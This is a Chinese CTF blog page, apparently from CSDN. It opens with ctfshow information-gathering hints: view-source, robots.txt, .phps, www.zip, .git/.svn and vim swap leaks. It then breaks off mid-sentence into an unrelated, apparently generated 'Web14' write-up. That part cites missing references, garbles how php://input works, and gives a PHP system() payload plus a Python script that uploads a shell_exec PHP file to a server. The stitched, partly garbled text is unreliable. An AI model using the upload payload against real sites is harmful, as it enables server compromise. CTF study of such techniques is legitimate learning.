ctfshow信息搜集

信息搜集1-20

前台JS绕过

js前台拦截 === 无效操作

当无法f12或者右键查看源代码的时候可以在URL栏view-source:http://网站/ 查看源码

协议头信息泄露

没思路的时候抓个包看看,可能会有意外收获

robots后台泄露

robots.txt文件

phps源码泄露

phps源码泄露有时候能帮上忙

关于 phps,phps 其实就是 PHP 的源代码文件, 通常用于提供给用户查看 PHP 代码, 因为用户无法直接通过 Web 浏览器看到 PHP 文件的内容, 所以需要用 phps 文件代替. 其实, 只要不用 PHP 等已经在服务器中注册过的 MIME 类型为文件即可, 但为了国际通用, 所以才用了 phps 文件类型.

访问 index.phps, 下载下来查看源代码, 即可得到 flag

源码压缩包泄露

解压源码到当前目录,测试正常,收工

www.zip

版本控制泄露源码

版本控制很重要,但不要部署到生产环境更重要。

/.git(可以用dirsearch扫描)

版本控制泄露源码2

版本控制很重要,但不要部署到生产环境更重要。

这次我猜是/.svn(是了)

vim临时文件泄露

发现网页有个错别字?赶紧在生产环境vim改下,不好,死机了</

### CTFShow Web14 的信息搜集与解题思路 #### 背景分析 CTFShow 平台是一个专注于网络安全竞赛的学习平台,其中的 Web 类型题目通常涉及常见的 Web 安全漏洞利用技巧。对于 Web14 题目,虽然具体描述未提供,但从已知的相关引用中可以推测可能涉及到 **Cookie 操作** 和 **文件包含漏洞**。 #### 关键技术点解析 1. **通过 Cookie 获取 Flag** 如果目标程序依赖于用户的 Cookie 数据来存储敏感信息,则可以通过修改或读取特定字段获取隐藏的数据。例如,在某些场景下,Flag 可能被直接嵌入到 Cookie 中[^1]。因此,建议检查当前会话中的所有 Cookies 是否存在异常命名或者编码后的字符串。 2. **PHP 文件包含漏洞 (LFI/RFI)** PHP 提供了一种机制允许开发者动态加载外部脚本作为输入源处理。然而当这种功能实现不当的时候就容易造成安全风险。特别需要注意的是 `php://input` 这一伪协议能够捕获 HTTP 请求正文部分的内容并将其视为流对象进行操作[^2]。如果应用程序支持上传表单且 Content-Type 设置为 multipart/form-data ,那么此时 php://input 将不会生效从而阻止恶意代码注入尝试;但如果其他类型的 MIME types 则仍然可能存在危险。 3. **Burp Suite 工具辅助攻击** 使用专业的渗透测试软件如 Burp Suite 来监控网络流量是非常有效的手段之一。它可以帮助我们观察服务器响应行为模式以及调试自定义负载效果如何影响最终结果。比如我们可以构造如下形式的有效载荷并通过 POST 方法发送给目标站点: ```php <?php system('cat ctf_go_go_go');?> ``` 此命令旨在调用 Linux shell 命令 cat 打印指定路径下的内容至标准输出设备上以便进一步收集线索[^3]。 #### 综合解决方案建议 基于上述理论基础,针对 Web14 应采取以下策略: - 查看是否存在可编辑项用于提交新的参数值; - 测试各种不同的 Payloads 结构寻找突破口; - 记录每一次交互过程便于后续回顾总结经验教训。 以下是模拟的一个简单 Python 脚本来自动化完成基本任务: ```python import requests url = 'http://example.com/vulnerable_endpoint' payload = '<?php echo shell_exec("ls"); ?>' files = { 'file': ('exploit.php', payload), } response = requests.post(url, files=files) print(response.text) ``` 此代码片段展示了如何向远程服务端投递含有潜在威胁性的 PHP 片段,并期望得到预期之外的结果反馈回来验证假设成立与否。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yn8rt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值